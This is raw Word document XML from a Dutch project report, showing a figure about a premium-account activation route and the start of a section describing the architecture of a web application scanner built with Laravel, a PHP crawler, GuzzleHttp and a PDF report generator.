              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253108224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F08271D" wp14:editId="0DA7E5E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-24765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>277495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5715000" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="216" name="Text Box 216"/>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9CB50D" w14:textId="670E32AB" w:rsidR="00E2204E" w:rsidRPr="00957BFC" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Dit stukje javascript code is voor het activeren van een premiumaccount. De </w:t>
                            </w:r>
                            <w:hyperlink r:id="rId107" w:history="1">
                              <w:r w:rsidRPr="00CB7761">
                                <w:rPr>
                                  <w:rStyle w:val="Hyperlink"/>
                                  <w:lang w:val="en-US"/>
                                </w:rPr>
                                <w:t>http://localhost:8000/active/</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> is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8271D" id="Text Box 216" o:spid="_x0000_s1230" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.95pt;margin-top:21.85pt;width:450pt;height:45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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6E9CB50D" w14:textId="670E32AB" w:rsidR="00E2204E" w:rsidRPr="00957BFC" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Dit stukje javascript code is voor het activeren van een premiumaccount. De </w:t>
                      </w:r>
                      <w:hyperlink r:id="rId108" w:history="1">
                        <w:r w:rsidRPr="00CB7761">
                          <w:rPr>
                            <w:rStyle w:val="Hyperlink"/>
                            <w:lang w:val="en-US"/>
                          </w:rPr>
                          <w:t>http://localhost:8000/active/</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> is de Route.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006C10FF" w:rsidRPr="006C10FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Een voorbeeld van de API in actie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB89072" w14:textId="0EB3E915" w:rsidR="007B5E44" w:rsidRPr="007B5E44" w:rsidRDefault="00957BFC" w:rsidP="008B186E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253107200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C5F81BD" wp14:editId="7963D0D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-24130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>772795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1682750"/>
            <wp:effectExtent l="25400" t="25400" r="34290" b="190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i call.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16827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4560A869" w14:textId="03CE43EF" w:rsidR="004C751F" w:rsidRDefault="00F03C4F" w:rsidP="008B186E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253227008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B10EC50" wp14:editId="212C8870">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-88265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1600200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1397000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="824" name="Text Box 824"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1397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7CA22" w14:textId="5E734353" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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EC50" id="Text Box 824" o:spid="_x0000_s1231" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-6.95pt;margin-top:126pt;width:110pt;height:27pt;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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="51F7CA22" w14:textId="5E734353" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.18</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCE999" w14:textId="237FC173" w:rsidR="004C751F" w:rsidRDefault="00D041CD" w:rsidP="008B186E">
      <w:pPr>
        <w:sectPr w:rsidR="004C751F" w:rsidSect="00241096">
          <w:headerReference w:type="first" r:id="rId110"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276887F4" w14:textId="0A4E6909" w:rsidR="008B186E" w:rsidRDefault="00DF1B5D" w:rsidP="00163804">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253097984" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65846B37" wp14:editId="3729E8A9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-916903</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="816" name="Rectangle 8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BE5F6" id="Rectangle 816" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.95pt;margin-top:-72.15pt;width:25pt;height:1031.7pt;z-index:-2502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vYJ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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00557C84">
        <w:t xml:space="preserve">5.6 </w:t>
      </w:r>
      <w:r w:rsidR="00163804">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47953191" w14:textId="09254E07" w:rsidR="00770C08" w:rsidRDefault="00F34BC5" w:rsidP="00770C08">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253155328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A6262DD" wp14:editId="5735F8D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>213360</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6159500" cy="681990"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="699" name="Text Box 699"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6159500" cy="68199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ABC8748" w14:textId="166AEC6E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>In dit deel zal ik de drie hoofdcomponenten van de webapplicatie scanner behandelen. Omdat het geen visueel aspect heeft zal ik code snippets laten zien van de belangrijkste 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262DD" id="Text Box 699" o:spid="_x0000_s1232" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:16.8pt;width:485pt;height:53.7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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1ABC8748" w14:textId="166AEC6E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>In dit deel zal ik de drie hoofdcomponenten van de webapplicatie scanner behandelen. Omdat het geen visueel aspect heeft zal ik code snippets laten zien van de belangrijkste functies.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B749F" w14:textId="77777777" w:rsidR="00770C08" w:rsidRPr="00770C08" w:rsidRDefault="00770C08" w:rsidP="00770C08"/>
    <w:p w14:paraId="57152FB8" w14:textId="750C00F7" w:rsidR="00163804" w:rsidRDefault="00F03C4F" w:rsidP="00163804">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253228032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="688DF46C" wp14:editId="35B842C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-24765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6061075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="825" name="Text Box 825"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1079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E2D4C" w14:textId="3A40164F" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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DF46C" id="Text Box 825" o:spid="_x0000_s1233" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.95pt;margin-top:477.25pt;width:85pt;height:27pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1B4E2D4C" w14:textId="3A40164F" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.19</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09248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="790E2DF3" wp14:editId="2C665EC1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-24130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>327660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6096000" cy="5715000"/>
                <wp:effectExtent l="0" t="0" r="25400" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21600" y="21600"/>
                    <wp:lineTo x="21600"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6096000" cy="5715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2E195" id="Rectangle 226" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1.9pt;margin-top:25.8pt;width:480pt;height:450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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004347F1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253111296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="693C6C21" wp14:editId="56DE621A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>801370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2079625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="649" name="Text Box 649"/>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DAB731" w14:textId="3B39C73A" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                            <w:pPr>
                              <w:jc w:val="cente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C6C21" id="Text Box 649" o:spid="_x0000_s1234" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.1pt;margin-top:163.75pt;width:340pt;height:27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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="67DAB731" w14:textId="3B39C73A" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>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3344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17256D9D" wp14:editId="1DDD8906">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>803275</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3340735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="650" name="Text Box 65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51008" w14:textId="66A8FFB7" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                            <w:pPr>
                              <w:jc w:val="cente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56D9D" id="Text Box 650" o:spid="_x0000_s1235" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.25pt;margin-top:263.05pt;width:340pt;height:27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VUhK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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2CC51008" w14:textId="66A8FFB7" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Scann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6416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="544178FE" wp14:editId="04C53DB9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>800735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2419985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="657" name="Text Box 657"/>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25F7B5" w14:textId="15B8F312" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>PHP Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2BC3E871" w14:textId="7351BFF8" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C8504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78FE" id="Text Box 657" o:spid="_x0000_s1236" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.05pt;margin-top:190.55pt;width:340pt;height:45.2pt;z-index:2531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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7F25F7B5" w14:textId="15B8F312" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PHP Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2BC3E871" w14:textId="7351BFF8" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>DOM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5392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CE35CF8" wp14:editId="599D5B52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>802005</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4482465</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="656" name="Text Box 656"/>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66FC20" w14:textId="4424E23A" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">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35CF8" id="Text Box 656" o:spid="_x0000_s1237" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.15pt;margin-top:352.95pt;width:340pt;height:27pt;z-index:2531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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C66FC20" w14:textId="4424E23A" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Rapport</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8464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74BB3678" wp14:editId="781F08B1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>801370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3676015</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="574040"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="658" name="Text Box 65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2EFD7" w14:textId="452B1023" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E416AF">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>GuzzleHttp</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="570064E2" w14:textId="2016E6FC" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00E416AF">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B3678" id="Text Box 658" o:spid="_x0000_s1238" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.1pt;margin-top:289.45pt;width:340pt;height:45.2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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C72EFD7" w14:textId="452B1023" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E416AF">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="570064E2" w14:textId="2016E6FC" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00E416AF">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Curl</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20512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24E74820" wp14:editId="7CEBAB7E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>800735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4820285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4318000" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="670" name="Text Box 670"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4318000"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9439CE" w14:textId="5BA7443D" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Http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74820" id="Text Box 670" o:spid="_x0000_s1239" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.05pt;margin-top:379.55pt;width:340pt;height:27.2pt;z-index:2531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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="279439CE" w14:textId="5BA7443D" w:rsidR="00E2204E" w:rsidRPr="00C85041" w:rsidRDefault="00E2204E" w:rsidP="00C85041">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Http2PDF</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004347F1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253110272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54095629" wp14:editId="60A033AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2452370</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>479425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1016635" cy="979170"/>
            <wp:effectExtent l="0" t="0" r="0" b="1143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aravel icon.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1016635" cy="979170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="004347F1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253121536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F47E25B" wp14:editId="7078AD60">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1627505</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1739265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2603500" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="0" b="12700"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="676" name="Text Box 676"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="260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09151" w14:textId="136B2D3C" w:rsidR="00E2204E" w:rsidRPr="009F6B8F" w:rsidRDefault="00E2204E" w:rsidP="00E416AF">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                                <w:sz w:val="28"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="009F6B8F">
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
